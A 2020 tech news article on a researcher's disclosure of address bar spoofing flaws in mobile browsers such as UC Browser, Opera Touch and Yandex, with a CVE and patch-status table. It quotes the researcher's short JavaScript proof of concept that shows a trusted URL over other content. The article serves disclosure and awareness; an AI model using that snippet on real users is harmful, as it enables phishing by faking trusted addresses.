Pakistani white-hat hacker finds vulnerabilities in multiple mobile browsers

By TechJuice on
October 20, 2020
  -   Like us now!  
 

Renowned Pakistani white-hat hacker and information security researcher, Rafay Baloch, has found vulnerabilities in multiple browsers.

Rafay has published a detailed paper on his website about the vulnerabilities and the browsers that are currently affected by them. Currently, most of us trust a website if the URL at the top looks okay. According to the demonstration made by Rafay, this can be exploited by a technique called address bar spoofing.

This works by showing the same URL as a site you trust while you are on a different site altogether. Say you want to go to bing.com so you click on a link to take you to Bing. You look at the top and it says bing.com but it won’t be Bing.

He has done this by using the following code (if you don’t understand code, you can just skip to the output image):

<p class="test"><input class="btn btn-success btn-lg" type="button" value="Run test case"
onclick="win = window.open(&quot;https://www.facebook.com:8080&quot;,&quot;WIN&quot;);
window.open(&quot;https://www.bing.com&quot;, &quot;WIN&quot;);
win.window.stop();
win.document.write('This is not Facebook');
win.document.close();
" /></p>

vulnerabilitiesRAFAY.jpg

The above output is from Opera Touch in iOS which is a very famous mobile browser. Similarly, the code was tested in multiple browsers on different operating systems. This was disclosed by the hacker as early as September to browser companies. Only Apple and Opera have responded to this according to Rafay Baloch.

The affected browsers are listed below:

CVEVendorBrowserVersionPlatformFixed?
CVE-2020-7363UCWebUC Browser13.0.8AndroidNo reply from vendor
CVE-2020-7364UCWebUC Browser13.0.8AndroidNo reply from vendor
CVE TBD-OperaOperaOpera Mini51.0.2254AndroidFix expected from vendor Nov. 11, 2020
CVE TBD-OperaOperaOpera Touch2.4.4iOSFix expected from vendor Nov. 11, 2020
CVE TBD-OperaOperaOpera Touch2.4.4iOSFix expected from vendor Nov. 11, 2020
CVE TBD-OperaOperaOpera Touch2.4.4iOSFix expected from vendor Nov. 11, 2020
CVE-2020-7369YandexYandex Browser20.8AndroidAutomated reply, followed up Oct. 19, 2020. Fix published Oct 1 in version 20.8.4.
CVE-2020-7370Danyil VasilenkoBolt Browser1.4iOSSupport email bounced, alerted Apple product security
CVE-2020-7371Raise IT SolutionsRITS Browser3.3.9AndroidFix expected Oct. 19, 2020
CVE-2020-9987AppleAppleiOS 13.6iOSFix released Sept. 16, 2020

 

Since COVID started, multiple browsers were found to be vulnerable to phishing attacks as well. This is worrying as a vendor like UCWeb has not even responded to the disclosure. UC browser is used by more than 500 million users.

Image Source: Computerworld

Like our stories? Follow our Instagram for pictorial updates.Follow @techjuicepk

 
iPhones 12’s new ceramic OLED display costs a whopping $279 to replace
 
 
 
Intel sells its NAND Memory business to SK Hynix for $9 billion